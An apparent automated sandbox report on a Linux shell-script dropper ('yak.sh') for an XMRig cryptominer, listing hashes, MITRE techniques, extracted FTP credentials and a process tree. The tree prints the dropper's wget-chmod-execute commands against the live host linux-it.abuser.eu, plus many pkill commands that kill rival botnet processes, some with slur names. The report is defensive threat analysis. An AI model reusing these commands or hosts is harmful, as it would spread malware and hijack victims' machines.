xmrig | ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

Analysis

max time kernel
150s
max time network
125s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
23-11-2024 23:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yak.sh
Size

2KB
MD5

f50f60f970a5203dad27c480da7b4519
SHA1

f50f26900efe72f11c37767b5db9a3916a7c76b4
SHA256

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
SHA512

40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd

Score

10^/10

xmrig xmrig_linux defense_evasion discovery miner

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
linux-it.abuser.eu
Port:
21
Username:
anonymous
Password:
[email protected]

Signatures

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral4/files/fstream-2.dat	family_xmrig
behavioral4/files/fstream-2.dat	xmrig

Xmrig family
xmrig
Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (4428) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	Process
741	chmod
761	chmod
964	chmod
972	chmod
808	chmod
846	chmod
892	chmod
983	chmod
911	chmod
953	chmod
1035	chmod
747	chmod
778	chmod
878	chmod

Executes dropped EXE 2 IoCs

Processes:

yakuza.mipsxmrig

ioc	pid	Process
/tmp/yakuza.mips	742	yakuza.mips
/tmp/xmrig	1036	xmrig

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkill

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

description	ioc	Process
File opened for reading	/proc/1099/status	pkill
File opened for reading	/proc/1212/cmdline	pkill
File opened for reading	/proc/770/cmdline	pkill
File opened for reading	/proc/125/cmdline	pkill
File opened for reading	/proc/366/cmdline	pkill
File opened for reading	/proc/678/cmdline	pkill
File opened for reading	/proc/252/cmdline	pkill
File opened for reading	/proc/15/cmdline	pkill
File opened for reading	/proc/14/status	pkill
File opened for reading	/proc/8/status	pkill
File opened for reading	/proc/680/cmdline	pkill
File opened for reading	/proc/388/cmdline	pkill
File opened for reading	/proc/75/cmdline	pkill
File opened for reading	/proc/1/status	pkill
File opened for reading	/proc/76/status	pkill
File opened for reading	/proc/711/cmdline	pkill
File opened for reading	/proc/335/cmdline	pkill
File opened for reading	/proc/757/status	pkill
File opened for reading	/proc/7/status	pkill
File opened for reading	/proc/749/status	pkill
File opened for reading	/proc/436/cmdline	pkill
File opened for reading	/proc/6/status	pkill
File opened for reading	/proc/17/status	pkill
File opened for reading	/proc/678/status	pkill
File opened for reading	/proc/235/cmdline	pkill
File opened for reading	/proc/720/status	pkill
File opened for reading	/proc/109/cmdline	pkill
File opened for reading	/proc/18/cmdline	pkill
File opened for reading	/proc/713/cmdline	pkill
File opened for reading	/proc/15/status	pkill
File opened for reading	/proc/21/cmdline	pkill
File opened for reading	/proc/9/cmdline	pkill
File opened for reading	/proc/14/status	pkill
File opened for reading	/proc/757/cmdline	pkill
File opened for reading	/proc/80/status	pkill
File opened for reading	/proc/70/cmdline	pkill
File opened for reading	/proc/109/cmdline	pkill
File opened for reading	/proc/82/status	pkill
File opened for reading	/proc/13/status	pkill
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/752/cmdline	pkill
File opened for reading	/proc/368/cmdline	pkill
File opened for reading	/proc/14/status	pkill
File opened for reading	/proc/3/status	pkill
File opened for reading	/proc/252/status	pkill
File opened for reading	/proc/24/status	pkill
File opened for reading	/proc/22/cmdline	pkill
File opened for reading	/proc/711/status	pkill
File opened for reading	/proc/22/status	pkill
File opened for reading	/proc/73/status	pkill
File opened for reading	/proc/674/cmdline	pkill
File opened for reading	/proc/1/status	pkill
File opened for reading	/proc/383/cmdline	ps
File opened for reading	/proc/79/cmdline	pkill
File opened for reading	/proc/368/status	pkill
File opened for reading	/proc/77/status	pkill
File opened for reading	/proc/711/cmdline	pkill
File opened for reading	/proc/20/status	pkill
File opened for reading	/proc/383/status	pkill
File opened for reading	/proc/68/cmdline	pkill
File opened for reading	/proc/17/cmdline	pkill
File opened for reading	/proc/3/status	pkill
File opened for reading	/proc/17/status	pkill
File opened for reading	/proc/752/cmdline	pkill

System Network Configuration Discovery 1 TTPs 9 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

yakuza.mipsyakuza.mipselshbusyboxwgetrmwgetrmpkill

pid	Process
742	yakuza.mips
748	yakuza.mipsel
1122	sh
1124	busybox
717	wget
744	rm
745	wget
750	rm
1123	pkill

Writes file to tmp directory 15 IoCs

Malware often drops required files in the /tmp directory.

Processes:

shwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetcurl

description	ioc	Process
File opened for modification	/tmp/S�@@p�~@8	sh
File opened for modification	/tmp/yakuza.sh	wget
File opened for modification	/tmp/yakuza.arm6	wget
File opened for modification	/tmp/yakuza.m68k	wget
File opened for modification	/tmp/yakuza.arm5	wget
File opened for modification	/tmp/yakuza.arm7	wget
File opened for modification	/tmp/yakuza.mips	wget
File opened for modification	/tmp/yakuza.i686	wget
File opened for modification	/tmp/yakuza.sparc	wget
File opened for modification	/tmp/yakuza.i586	wget
File opened for modification	/tmp/yakuza.arm4	wget
File opened for modification	/tmp/yakuza.mipsel	wget
File opened for modification	/tmp/yakuza.x86	wget
File opened for modification	/tmp/yakuza.ppc	wget
File opened for modification	/tmp/xmrig	curl

/tmp/yak.sh
/tmp/yak.sh
1⤵
PID:714
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:717
- /bin/chmod
  chmod +x yakuza.mips
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/yakuza.mips
  ./yakuza.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:742
- /bin/rm
  rm -rf yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:744
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:745
- /bin/chmod
  chmod +x yakuza.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/yakuza.mipsel
  ./yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:748
- - /bin/sh
    sh -c "pkill -9 902i13 || busybox pkill -9 902i13"
    3⤵
    PID:753
  - - /usr/bin/pkill
      pkill -9 902i13
      4⤵
      PID:755
  - - /bin/busybox
      busybox pkill -9 902i13
      4⤵
      PID:756
- - /bin/sh
    sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
    3⤵
    PID:758
  - - /usr/bin/pkill
      pkill -9 BzSxLxBxeY
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:759
  - - /bin/busybox
      busybox pkill -9 BzSxLxBxeY
      4⤵
      PID:760
- - /bin/sh
    sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"
    3⤵
    PID:766
  - - /usr/bin/pkill
      pkill -9 HOHO-LUGO7
      4⤵
      Reads CPU attributes
      PID:768
  - - /bin/busybox
      busybox pkill -9 HOHO-LUGO7
      4⤵
      PID:769
- - /bin/sh
    sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"
    3⤵
    PID:770
  - - /usr/bin/pkill
      pkill -9 HOHO-U79OL
      4⤵
      Reads runtime system information
      PID:771
  - - /bin/busybox
      busybox pkill -9 HOHO-U79OL
      4⤵
      PID:772
- - /bin/sh
    sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"
    3⤵
    PID:773
  - - /usr/bin/pkill
      pkill -9 JuYfouyf87
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:774
  - - /bin/busybox
      busybox pkill -9 JuYfouyf87
      4⤵
      PID:775
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:776
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      Reads CPU attributes
      PID:777
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:779
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:784
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      Reads runtime system information
      PID:785
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:786
- - /bin/sh
    sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"
    3⤵
    PID:787
  - - /usr/bin/pkill
      pkill -9 LOLKIKEEEDDE
      4⤵
      Reads runtime system information
      PID:788
  - - /bin/busybox
      busybox pkill -9 LOLKIKEEEDDE
      4⤵
      PID:789
- - /bin/sh
    sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"
    3⤵
    PID:794
  - - /usr/bin/pkill
      pkill -9 ekjheory98e
      4⤵
      Reads CPU attributes
      PID:795
  - - /bin/busybox
      busybox pkill -9 ekjheory98e
      4⤵
      PID:798
- - /bin/sh
    sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"
    3⤵
    PID:803
  - - /usr/bin/pkill
      pkill -9 scansh4
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:804
  - - /bin/busybox
      busybox pkill -9 scansh4
      4⤵
      PID:805
- - /bin/sh
    sh -c "pkill -9 MDMA || busybox pkill -9 MDMA"
    3⤵
    PID:810
  - - /usr/bin/pkill
      pkill -9 MDMA
      4⤵
      Reads CPU attributes
      PID:811
  - - /bin/busybox
      busybox pkill -9 MDMA
      4⤵
      PID:815
- - /bin/sh
    sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"
    3⤵
    PID:822
  - - /usr/bin/pkill
      pkill -9 fdevalvex
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:823
  - - /bin/busybox
      busybox pkill -9 fdevalvex
      4⤵
      PID:824
- - /bin/sh
    sh -c "pkill -9 scanspc || busybox pkill -9 scanspc"
    3⤵
    PID:831
  - - /usr/bin/pkill
      pkill -9 scanspc
      4⤵
      Reads CPU attributes
      PID:832
  - - /bin/busybox
      busybox pkill -9 scanspc
      4⤵
      PID:834
- - /bin/sh
    sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"
    3⤵
    PID:840
  - - /usr/bin/pkill
      pkill -9 MELTEDNINJAREALZ
      4⤵
      Reads CPU attributes
      PID:842
  - - /bin/busybox
      busybox pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:844
- - /bin/sh
    sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"
    3⤵
    PID:857
  - - /usr/bin/pkill
      pkill -9 flexsonskids
      4⤵
      Reads CPU attributes
      PID:858
  - - /bin/busybox
      busybox pkill -9 flexsonskids
      4⤵
      PID:860
- - /bin/sh
    sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"
    3⤵
    PID:865
  - - /usr/bin/pkill
      pkill -9 scanx86
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:869
  - - /bin/busybox
      busybox pkill -9 scanx86
      4⤵
      PID:870
- - /bin/sh
    sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"
    3⤵
    PID:872
  - - /usr/bin/pkill
      pkill -9 MISAKI-U79OL
      4⤵
      Reads runtime system information
      PID:873
  - - /bin/busybox
      busybox pkill -9 MISAKI-U79OL
      4⤵
      PID:874
- - /bin/sh
    sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"
    3⤵
    PID:875
  - - /usr/bin/pkill
      pkill -9 foAxi102kxe
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:876
  - - /bin/busybox
      busybox pkill -9 foAxi102kxe
      4⤵
      PID:877
- - /bin/sh
    sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"
    3⤵
    PID:883
  - - /usr/bin/pkill
      pkill -9 swodjwodjwoj
      4⤵
      PID:884
  - - /bin/busybox
      busybox pkill -9 swodjwodjwoj
      4⤵
      PID:885
- - /bin/sh
    sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"
    3⤵
    PID:886
  - - /usr/bin/pkill
      pkill -9 MmKiy7f87l
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:887
  - - /bin/busybox
      busybox pkill -9 MmKiy7f87l
      4⤵
      PID:888
- - /bin/sh
    sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"
    3⤵
    PID:889
  - - /usr/bin/pkill
      pkill -9 freecookiex86
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:890
  - - /bin/busybox
      busybox pkill -9 freecookiex86
      4⤵
      PID:891
- - /bin/sh
    sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"
    3⤵
    PID:895
  - - /usr/bin/pkill
      pkill -9 sysgpu
      4⤵
      PID:896
  - - /bin/busybox
      busybox pkill -9 sysgpu
      4⤵
      PID:899
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:900
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      PID:901
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:902
- - /bin/sh
    sh -c "pkill -9 frgege || busybox pkill -9 frgege"
    3⤵
    PID:903
  - - /usr/bin/pkill
      pkill -9 frgege
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:904
  - - /bin/busybox
      busybox pkill -9 frgege
      4⤵
      PID:905
- - /bin/sh
    sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"
    3⤵
    PID:906
  - - /usr/bin/pkill
      pkill -9 sysupdater
      4⤵
      Reads runtime system information
      PID:907
  - - /bin/busybox
      busybox pkill -9 sysupdater
      4⤵
      PID:908
- - /bin/sh
    sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"
    3⤵
    PID:918
  - - /usr/bin/pkill
      pkill -9 0DnAzepd
      4⤵
      Reads CPU attributes
      PID:919
  - - /bin/busybox
      busybox pkill -9 0DnAzepd
      4⤵
      PID:922
- - /bin/sh
    sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"
    3⤵
    PID:928
  - - /usr/bin/pkill
      pkill -9 NiGGeRD0nks69
      4⤵
      Reads CPU attributes
      PID:929
  - - /bin/busybox
      busybox pkill -9 NiGGeRD0nks69
      4⤵
      PID:931
- - /bin/sh
    sh -c "pkill -9 frgreu || busybox pkill -9 frgreu"
    3⤵
    PID:947
  - - /usr/bin/pkill
      pkill -9 frgreu
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:948
  - - /bin/busybox
      busybox pkill -9 frgreu
      4⤵
      PID:950
- - /bin/sh
    sh -c "pkill -9 telnetd || busybox pkill -9 telnetd"
    3⤵
    PID:958
  - - /usr/bin/pkill
      pkill -9 telnetd
      4⤵
      PID:959
  - - /bin/busybox
      busybox pkill -9 telnetd
      4⤵
      PID:960
- - /bin/sh
    sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"
    3⤵
    PID:961
  - - /usr/bin/pkill
      pkill -9 0x766f6964
      4⤵
      PID:962
  - - /bin/busybox
      busybox pkill -9 0x766f6964
      4⤵
      PID:963
- - /bin/sh
    sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"
    3⤵
    PID:969
  - - /usr/bin/pkill
      pkill -9 NiGGeRd0nks1337
      4⤵
      PID:970
  - - /bin/busybox
      busybox pkill -9 NiGGeRd0nks1337
      4⤵
      PID:971
- - /bin/sh
    sh -c "pkill -9 gaft || busybox pkill -9 gaft"
    3⤵
    PID:973
  - - /usr/bin/pkill
      pkill -9 gaft
      4⤵
      Reads CPU attributes
      PID:976
  - - /bin/busybox
      busybox pkill -9 gaft
      4⤵
      PID:977
- - /bin/sh
    sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"
    3⤵
    PID:980
  - - /usr/bin/pkill
      pkill -9 urasgbsigboa
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:981
  - - /bin/busybox
      busybox pkill -9 urasgbsigboa
      4⤵
      PID:982
- - /bin/sh
    sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"
    3⤵
    PID:994
  - - /usr/bin/pkill
      pkill -9 120i3UI49
      4⤵
      Reads runtime system information
      PID:995
  - - /bin/busybox
      busybox pkill -9 120i3UI49
      4⤵
      PID:996
- - /bin/sh
    sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"
    3⤵
    PID:999
  - - /usr/bin/pkill
      pkill -9 OaF3
      4⤵
      Reads CPU attributes
      PID:1000
  - - /bin/busybox
      busybox pkill -9 OaF3
      4⤵
      PID:1001
- - /bin/sh
    sh -c "pkill -9 geae || busybox pkill -9 geae"
    3⤵
    PID:1002
  - - /usr/bin/pkill
      pkill -9 geae
      4⤵
      Reads CPU attributes
      PID:1003
  - - /bin/busybox
      busybox pkill -9 geae
      4⤵
      PID:1004
- - /bin/sh
    sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"
    3⤵
    PID:1005
  - - /usr/bin/pkill
      pkill -9 vaiolmao
      4⤵
      Reads CPU attributes
      PID:1006
  - - /bin/busybox
      busybox pkill -9 vaiolmao
      4⤵
      PID:1007
- - /bin/sh
    sh -c "pkill -9 123123a || busybox pkill -9 123123a"
    3⤵
    PID:1008
  - - /usr/bin/pkill
      pkill -9 123123a
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1009
  - - /bin/busybox
      busybox pkill -9 123123a
      4⤵
      PID:1010
- - /bin/sh
    sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"
    3⤵
    PID:1011
  - - /usr/bin/pkill
      pkill -9 Ofurain0n4H34D
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1012
  - - /bin/busybox
      busybox pkill -9 Ofurain0n4H34D
      4⤵
      PID:1013
- - /bin/sh
    sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"
    3⤵
    PID:1014
  - - /usr/bin/pkill
      pkill -9 ggTrex
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1015
  - - /bin/busybox
      busybox pkill -9 ggTrex
      4⤵
      PID:1016
- - /bin/sh
    sh -c "pkill -9 wasads || busybox pkill -9 wasads"
    3⤵
    PID:1017
  - - /usr/bin/pkill
      pkill -9 wasads
      4⤵
      Reads runtime system information
      PID:1018
  - - /bin/busybox
      busybox pkill -9 wasads
      4⤵
      PID:1019
- - /bin/sh
    sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"
    3⤵
    PID:1020
  - - /usr/bin/pkill
      pkill -9 1293194hjXD
      4⤵
      Reads runtime system information
      PID:1021
  - - /bin/busybox
      busybox pkill -9 1293194hjXD
      4⤵
      PID:1022
- - /bin/sh
    sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"
    3⤵
    PID:1023
  - - /usr/bin/pkill
      pkill -9 OthLaLosn
      4⤵
      Reads CPU attributes
      PID:1024
  - - /bin/busybox
      busybox pkill -9 OthLaLosn
      4⤵
      PID:1025
- - /bin/sh
    sh -c "pkill -9 ggt || busybox pkill -9 ggt"
    3⤵
    PID:1026
  - - /usr/bin/pkill
      pkill -9 ggt
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1027
  - - /bin/busybox
      busybox pkill -9 ggt
      4⤵
      PID:1028
- - /bin/sh
    sh -c "pkill -9 wget-log || busybox pkill -9 wget-log"
    3⤵
    PID:1029
  - - /usr/bin/pkill
      pkill -9 wget-log
      4⤵
      Reads CPU attributes
      PID:1030
  - - /bin/busybox
      busybox pkill -9 wget-log
      4⤵
      PID:1031
- - /bin/sh
    sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"
    3⤵
    PID:1032
  - - /usr/bin/pkill
      pkill -9 1337SoraLOADER
      4⤵
      Reads CPU attributes
      PID:1033
  - - /bin/busybox
      busybox pkill -9 1337SoraLOADER
      4⤵
      PID:1034
- - /bin/sh
    sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"
    3⤵
    PID:1038
  - - /usr/bin/pkill
      pkill -9 SAIAKINA
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1039
  - - /bin/busybox
      busybox pkill -9 SAIAKINA
      4⤵
      PID:1040
- - /bin/sh
    sh -c "pkill -9 ggtq || busybox pkill -9 ggtq"
    3⤵
    PID:1041
  - - /usr/bin/pkill
      pkill -9 ggtq
      4⤵
      Reads runtime system information
      PID:1042
  - - /bin/busybox
      busybox pkill -9 ggtq
      4⤵
      PID:1043
- - /bin/sh
    sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"
    3⤵
    PID:1044
  - - /usr/bin/pkill
      pkill -9 1378bfp919GRB1Q2
      4⤵
      Reads CPU attributes
      PID:1045
  - - /bin/busybox
      busybox pkill -9 1378bfp919GRB1Q2
      4⤵
      PID:1046
- - /bin/sh
    sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"
    3⤵
    PID:1047
  - - /usr/bin/pkill
      pkill -9 SAIAKUSO
      4⤵
      PID:1048
  - - /bin/busybox
      busybox pkill -9 SAIAKUSO
      4⤵
      PID:1049
- - /bin/sh
    sh -c "pkill -9 ggtr || busybox pkill -9 ggtr"
    3⤵
    PID:1050
  - - /usr/bin/pkill
      pkill -9 ggtr
      4⤵
      PID:1051
  - - /bin/busybox
      busybox pkill -9 ggtr
      4⤵
      PID:1052
- - /bin/sh
    sh -c "pkill -9 14Fa || busybox pkill -9 14Fa"
    3⤵
    PID:1053
  - - /usr/bin/pkill
      pkill -9 14Fa
      4⤵
      Reads CPU attributes
      PID:1054
  - - /bin/busybox
      busybox pkill -9 14Fa
      4⤵
      PID:1055
- - /bin/sh
    sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"
    3⤵
    PID:1056
  - - /usr/bin/pkill
      pkill -9 SEXSLAVE1337
      4⤵
      Reads CPU attributes
      PID:1057
  - - /bin/busybox
      busybox pkill -9 SEXSLAVE1337
      4⤵
      PID:1058
- - /bin/sh
    sh -c "pkill -9 ggtt || busybox pkill -9 ggtt"
    3⤵
    PID:1059
  - - /usr/bin/pkill
      pkill -9 ggtt
      4⤵
      PID:1060
  - - /bin/busybox
      busybox pkill -9 ggtt
      4⤵
      PID:1061
- - /bin/sh
    sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"
    3⤵
    PID:1062
  - - /usr/bin/pkill
      pkill -9 1902a3u912u3u4
      4⤵
      Reads runtime system information
      PID:1063
  - - /bin/busybox
      busybox pkill -9 1902a3u912u3u4
      4⤵
      PID:1064
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:1065
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      PID:1066
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:1067
- - /bin/sh
    sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"
    3⤵
    PID:1068
  - - /usr/bin/pkill
      pkill -9 haetrghbr
      4⤵
      Reads runtime system information
      PID:1069
  - - /bin/busybox
      busybox pkill -9 haetrghbr
      4⤵
      PID:1070
- - /bin/sh
    sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"
    3⤵
    PID:1071
  - - /usr/bin/pkill
      pkill -9 19ju3d
      4⤵
      Reads runtime system information
      PID:1072
  - - /bin/busybox
      busybox pkill -9 19ju3d
      4⤵
      PID:1073
- - /bin/sh
    sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"
    3⤵
    PID:1074
  - - /usr/bin/pkill
      pkill -9 SORAojkf120
      4⤵
      Reads runtime system information
      PID:1075
  - - /bin/busybox
      busybox pkill -9 SORAojkf120
      4⤵
      PID:1076
- - /bin/sh
    sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"
    3⤵
    PID:1077
  - - /usr/bin/pkill
      pkill -9 hehahejeje92
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1078
  - - /bin/busybox
      busybox pkill -9 hehahejeje92
      4⤵
      PID:1079
- - /bin/sh
    sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"
    3⤵
    PID:1080
  - - /usr/bin/pkill
      pkill -9 2U2JDJA901F91
      4⤵
      Reads CPU attributes
      PID:1081
  - - /bin/busybox
      busybox pkill -9 2U2JDJA901F91
      4⤵
      PID:1082
- - /bin/sh
    sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"
    3⤵
    PID:1083
  - - /usr/bin/pkill
      pkill -9 SlaVLav12
      4⤵
      Reads CPU attributes
      PID:1084
  - - /bin/busybox
      busybox pkill -9 SlaVLav12
      4⤵
      PID:1085
- - /bin/sh
